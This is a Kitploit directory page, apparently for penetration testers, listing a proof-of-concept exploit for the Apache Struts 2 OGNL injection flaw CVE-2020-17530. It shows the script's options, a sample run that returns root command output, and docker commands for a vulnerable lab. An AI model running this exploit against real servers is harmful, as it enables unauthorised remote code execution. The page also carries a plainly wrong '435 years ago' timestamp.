Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-17530 — Proof-of-concept exploit for CVE-2020-17530, a remote code execution vulnerability in Apache Struts 2 via OGNL injection. Includes a Python script for targeting vulnerable Struts instances. 针对 CVE-2020-17530 的概念验证利用程序,该漏洞是 Apache Struts 2 中通过 OGNL 注入导致的远程代码执行漏洞。包含一个用于定位易受攻击 Struts 实例的 Python 脚本。 | Kitploit
工具/GitHubGitHub/cyborgsecurity/cve-2020-17530
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Archived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

关于

Proof-of-concept exploit for CVE-2020-17530, a remote code execution vulnerability in Apache Struts 2 via OGNL injection. Includes a Python script for targeting vulnerable Struts instances. 针对 CVE-2020-17530 的概念验证利用程序,该漏洞是 Apache Struts 2 中通过 OGNL 注入导致的远程代码执行漏洞。包含一个用于定位易受攻击 Struts 实例的 Python 脚本。

分享
435年前尚未审核

CVE-2020-17530

CVE-2020-17530 的快速概念验证。在 Apache Struts 版本 2.0.0 至 2.5.25 中,对标签属性中原始用户输入进行强制对象图导航语言(OGNL)评估可能导致远程代码执行(RCE)。

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

设置

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
下载工具